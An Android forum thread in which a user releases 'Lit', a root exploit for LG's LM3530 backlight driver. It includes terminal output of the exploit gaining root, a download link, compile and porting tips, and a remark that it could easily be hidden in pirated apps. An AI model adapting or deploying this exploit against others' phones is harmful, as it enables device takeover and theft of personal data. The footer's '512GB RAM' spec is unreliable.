1. Are you ready for the Galaxy S20? Here is everything we know so far!

Privilidge Escailation exploit in LG's backlight driver

Discussion in 'Android Devices' started by giantpune, Oct 25, 2012.

  1. giantpune

    giantpune Android Enthusiast
    Thread Starter

    So yesterday I was messing around with trying to get cm7 working when I ran an innocent shell command and my phone crashed. I tracked the cause back to the driver for the backlight in our LCD screen. While I was looking at it, I saw that the bug I found could actually be used to gain root access on our phone from any app that runs.

    It took a couple hours to work up a working example for this that did something besides crash the phone, and named it 'Lit'. I already have quite a few root exploits for our phone saved up in case LG decides to fix the ones we have publicly. So theres nothing really to lose by not keeping this one to myself.

    I suspect this one also affect other LG phones using the same buggy backlight driver. I have hardcoded an address in this code. To get it working on other models, somebody would need to get the correct address. Lit is a commandline program, so run it from the terminal emulator or adb or something and hopefully it'll give you a root shell. You might also want to contact LG and demand they fix it. I'm not really going to bother with that since I called and emailed them back in July about another one and got ignored.

    Code (Text):
    1.  
    2. j@media-pc:~$ adb shell
    3. $ uname -a
    4. Linux localhost 2.6.35.11 #1 PREEMPT Tue Jun 19 23:02:28 KST 2012 armv7l GNU/Linux
    5. $ getprop | grep device
    6. [ro.product.device]: [m3s]
    7. $ id
    8. uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet)
    9. $ /data/local/tmp/lit
    10. Lit - root exploit for the LG LM3530 backlight driver
    11. 2012 giantpune
    12. [+] Using 29287461 as adapter address
    13. [+] Opened led reg file
    14. [+] Mapped 29287000
    15. [+] algoAddr is at 29287000
    16. [+] got root
    17. # id
    18. uid=0(root) gid=0(root)
    19. #
    20.  
    Download lit.tar.gz from Sendspace.com - send big files the easy way
     


  2. kwknott

    kwknott Android Expert

    Geez your finding more holes in this phone than Swiss cheese :D
     
  3. Curtis1973

    Curtis1973 Android Expert

    this phone doesnt have holes..it has BLACKHOLES lol
     
  4. HaTrEd360

    HaTrEd360 Android Expert

    Lmfao xD
     
  5. ktb83

    ktb83 Android Enthusiast

    If any app can exploit a hole like this one, then Google Wallet has no business being on this phone. :D
     
    stormyhigh likes this.
  6. giantpune

    giantpune Android Enthusiast
    Thread Starter

    With multiple hole like this one, I wouldn't put my email address, credit card info, or any other personal information into this phone. If it wasn't a prepaid phone, I'd say to check your account every now and then and make sure there aren't any strange 1900 calls or texts sent to those premium numbers that charge you $2 a message.

    With any app being able to get root access whenever it wants, they can most certainly do all this stuff. Definitely make sure you only install apps from trusted places. It would be trivial to stick this or a similar exploit into anglybirds and toss it up on thepiratebay and before you know it, your phone becomes somebody else's phone.
     
    Dark One likes this.
  7. lphy

    lphy Newbie

    giantpune, thanks for this great tool

    I am very curious about this small program you wrote, how do I re-compile main.c (If I want to do some changes and try it)

    what kind of tools did you use to compile it

    Thanks
     
  8. giantpune

    giantpune Android Enthusiast
    Thread Starter

    I used the gcc arm compiler from ndk r8(ish) to make the binary. As far as modifications go, I've found that if you tweak the mmap arguments a bit to get rid of the unnecessary executable permission, the mmap will succeed on some other devices and this exploit works. There are actually about 8 different backlight drivers from LG affected by this one, being used in several models. My root/cwm installer for the L38c family of phones uses this it ( http://androidforums.com/l3-all-things-root/682486-root-apk-l38c.html ).

    The optimus V 's backlight driver is also vulnerable, but as the cpu+kernel config is setup in a way that doesn't let us run unaligned addresses, the kernel panics rather than executing the specified address.
     
  9. lphy

    lphy Newbie

    giantpune,

    Thanks for bunch for this useful information, I will start paying with the compiler to see whether I can compile it to run in my phone

    Thanks again
     

LG Optimus Elite Forum

The LG Optimus Elite release date was May 2012. Features and Specs include a 3.5" inch screen, 5MP camera, 512GB RAM, Snapdragon S2 processor, and 1520mAh battery.

May 2012
Release Date
0
Reviews
Loading...
Similar Threads - Privilidge Escailation exploit
  1. mikedt
    Replies:
    5
    Views:
    1,246
  2. svim
    Replies:
    2
    Views:
    742

Share This Page

Loading...